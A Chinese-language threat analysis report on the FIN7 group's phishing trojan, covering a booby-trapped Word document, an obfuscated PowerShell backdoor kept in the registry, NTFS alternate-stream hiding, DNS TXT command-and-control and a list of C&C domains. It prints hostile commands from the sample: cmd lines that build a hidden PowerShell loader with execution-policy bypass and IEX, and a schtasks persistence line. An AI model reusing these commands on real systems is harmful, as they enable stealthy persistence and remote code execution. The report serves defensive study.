FIN7 APT组织攻击木马分析报告

2017-06-19 526248人围观 ,发现 4 个不明物体 安全报告特别企划

事件背景

2017年3月,FireEye发布了一篇名黑客组织FIN7的APT攻击简报,报告称FIN7组织以钓鱼邮件为攻击渠道,主要对美国金融机构渗透攻击。组织的攻击利用DNS协议的TXT字段进行C&C通信。360威胁情报中心对此APT组织的攻击链条进行了梳理,对木马相关的技术进行了分析,揭示其一些有意思的技巧。

目标样本

Hash d04b6410dddee19adec75f597c52e386
文件类型 Word文档
文件大小 1,834,496字节

攻击特点与攻击流程

FIN7攻击特点主要体现在:

1. 全部攻击过程使用非PE实现,钓鱼使用doc文件,后门使用powershell文件。

2. 使用ADS数据隐藏保存在磁盘中的非PE文件

3. 后门文件保存在注册表中,功能由Powershell实现

4. 与C&C通信使用DNS协议的TXT记录

5. C&C地址从64个硬编码的地址中随机选择

攻击流程:

在整个攻击过程中,没有使用到PE文件,这在一定程度上躲避了安全软件的查杀。落地的文件也进行了技术上的隐藏,而真正的后门程序却已加密的方式存储在注册表中。

攻击者以钓鱼邮件为进入渠道,在恶意文档中嵌入vbs脚本,vbs脚本运行后解密后门程序写入注册表中,同时将调用后门程序的脚本以ads隐藏在磁盘文件中。在后门运行后,使用DNS TXT做为C&C通信方式。

图片1.png

样本分析

钓鱼邮件打开后,显示如下图所示,可以看到,文档中插入了一张图片,图片字体显示模糊。

 

图片2.png


通过分析,得到了钓鱼文档的制作过程:分别插入了一个vbs的OLE对象与一张字迹模糊的图片,将OLE对象的图标设置为透明图标并置入图片对象的顶层,最将两个对象组合到一起,这样就达到了双击图片,实际上运行了vbs脚本的目的。

双击图片,就会打开vbs脚本,只有当用户点击弹出的对话框中的确定后,才会运行vbs脚本,如果在这时,用户点击了取消,就可以阻断这次攻击。

图片3.png

为了诱导用户双击图片运行vbs脚本,文档中还写入“This document is protected by Microsoft Office and requires human verification  Please Enable Editing and Double Click on page below.”(文档被Microsoft Office 保护,请启用编辑并双击下面的图片)。

VBS功能:

当上面的图片被双击运行后,程序后台会运行VBS脚本,该脚本功能为:调用powershell解密一大段字符,从代码中可以看出,解密出来的为一gz文件,因此可以将这大段base64解密后,保存成gz格式,使用解压工具得到压缩文件继续分析。

图片4.png


样本加载感染过程:

gz中的文件也是一个powershell脚本。脚本经过混淆,实现的功能是:判断当前用户是不是administartor权限,根据不同的权限写入不同的注册表内容,这些内容为开机后会解密执行的代码,随后通过ADS将加载注册表内容的vbs脚本写入C:\ProgramData\windows :CtxDnsClient.vbs文件中,并将该文件加入启动项和计划任务中。

 原始的powershell内容,可以看到powershell脚本经过了混淆:


图片5.png

后门程序写入注册表

Powershell写入到注册表中的后门程序的内容如下:

图片6.png

ADS隐藏磁盘文件

将要实现开机启动的文件写入到磁盘文件C:\ProgramData\Windows:CtxDnsClient.vbs中。

对于Windows:CtxDnsClient.vbs文件,使用了ADS数据隐藏技术。而通过ADS隐藏的数据在Windows系统中无法显示,文件大小也显示为0字节:

图片7.png 

但是使用dir /r命令,可以看到ADS中有隐藏的数据

图片8.png 

启动项中的隐藏的ads数据,dump出来后显示如下:

图片9.png 

使用 ADS中隐藏数据内容为:

cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs" 

cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass -C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"

添加开机启动

创建的启动项,启动项位置为HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

图片10.png

添加计划任务:

schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i 30

通过上面这些过程,来实现程序的自启动。在系统重新启动后,启动项中的wscript.exe会加载Windows:CtxDnsClient.vbs Windows:CtxDnsClient.vbs中会使用powershell加载HKCU\Software\Microsoft\Windows \Part内容,part中实现的功能会加载注册表相同位置下的CtxDnsClient的内容。这里的内容就是真正的实现CC的功能。

C&C通信功能

这部分功能主要在注册表中的HKCU\Software\Microsoft\Windows CtxDnsClient的内容中,主要功能为:从内置的64个域名中随机选择一个,查询该域名的SPF记录,用来实现自己的C&C通信。

创建名为”SourceFireSux”的互斥体,防止程序重复运行:

图片11.png

编码过的64个域名地址代码片段:

图片12.png 

图片13.png 

从这64个域名中,随机选取一个(如这里随机被选择到的为:pbbk.us),加上www前缀,查询对应DNS TXT记录内容(即查询www.pbbk.us的dns txt记录)。

图片14.png

如果返回的内容为idle,则程序睡眠3.5秒到5.4秒的随机时间。

如果返回的内容为www,则表明这个域名现在正在攻击者控制之中,随后查询mail.pbbk.us的dns txt记录。

随后mail.pbbk.us返回的内容就被 powershell直接通过IEX调用执行。

IOC

木马尝试通信的C&C地址:

域名 注册人 注册时间 备注
www.grij.us Frank Walters 2017/2/19 3:09  
www.kwoe.us Frank Walters 2017/2/19 3:09  
www.zugh.us Frank Walters 2017/2/19 3:09  
www.pafk.us Frank Walters 2017/2/19 3:09  
www.cuuo.us Frank Walters 2017/2/19 3:07  
www.ooyh.us Frank Walters 2017/2/19 3:07  
www.vxqt.us Frank Walters 2017/2/19 3:06  
www.cgqy.us Frank Walters 2017/2/19 3:07  
www.wfsv.us Frank Walters 2017/2/19 3:07  
www.palj.us Frank Walters 2017/2/19 3:09  
www.idjb.us Frank Walters 2017/2/19 3:09  
www.zjav.us Frank Walters 2017/2/19 3:09  
www.mewt.us Frank Walters 2017/2/19 3:06  
www.vkpo.us Frank Walters 2017/2/19 3:07  
www.wqiy.info WhoisGuard Protected 2017/2/18 19:08  
www.wvzu.pw WhoisGuard Protected 2017/2/18 0:00  
www.gxhp.top WhoisGuard Protected 2017/2/18 19:07  
www.hvzr.info WhoisGuard Protected 2017/2/18 19:07  
www.reld.info WhoisGuard Protected 2017/2/18 0:00  
www.vqba.info WhoisGuard Protected 2017/2/18 19:06  
www.oxrp.info WhoisGuard Protected 2017/2/18 19:08  
www.dvso.pw WhoisGuard Protected 2017/2/18 0:00  
www.bvyv.club      
www.bwuk.club      
www.cihr.site      
www.coec.club      
www.oyaw.club      
www.pbbk.us      
www.ppdx.pw      
www.pvze.club      
www.qefg.info      
www.qlpa.club      
www.ueox.club      
www.ufyb.club      
www.dbxa.pw      
www.eady.club      
www.enuv.club      
www.eter.pw      
www.utca.site      
www.vdfe.site      
www.vjro.club      
www.fbjz.pw      
www.fhyi.club      
www.futh.pw      
www.gnoa.pw      
www.vwcq.us      
www.jimw.club      
www.jomp.site      
www.jxhv.site      
www.kshv.site      
www.ysxy.pw      
www.zmyo.club      
www.zody.pw      
www.lhlv.club      
www.lnoy.site      
www.lvrm.pw      
www.mfka.pw      
www.nxpu.site      
www.oaax.site      
www.odyr.us      
www.oknz.club      
www.ooep.pw      
www.ckwl.pw Lin Shi Mo Ban 2015/11/11 0:00 不能作为IOC
www.zcnt.pw Lin Shi Mo Ban 2015/11/16 0:00 不能作为IOC

参考链接

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

发表评论

已有 4 条评论

取消
Loading...
css.php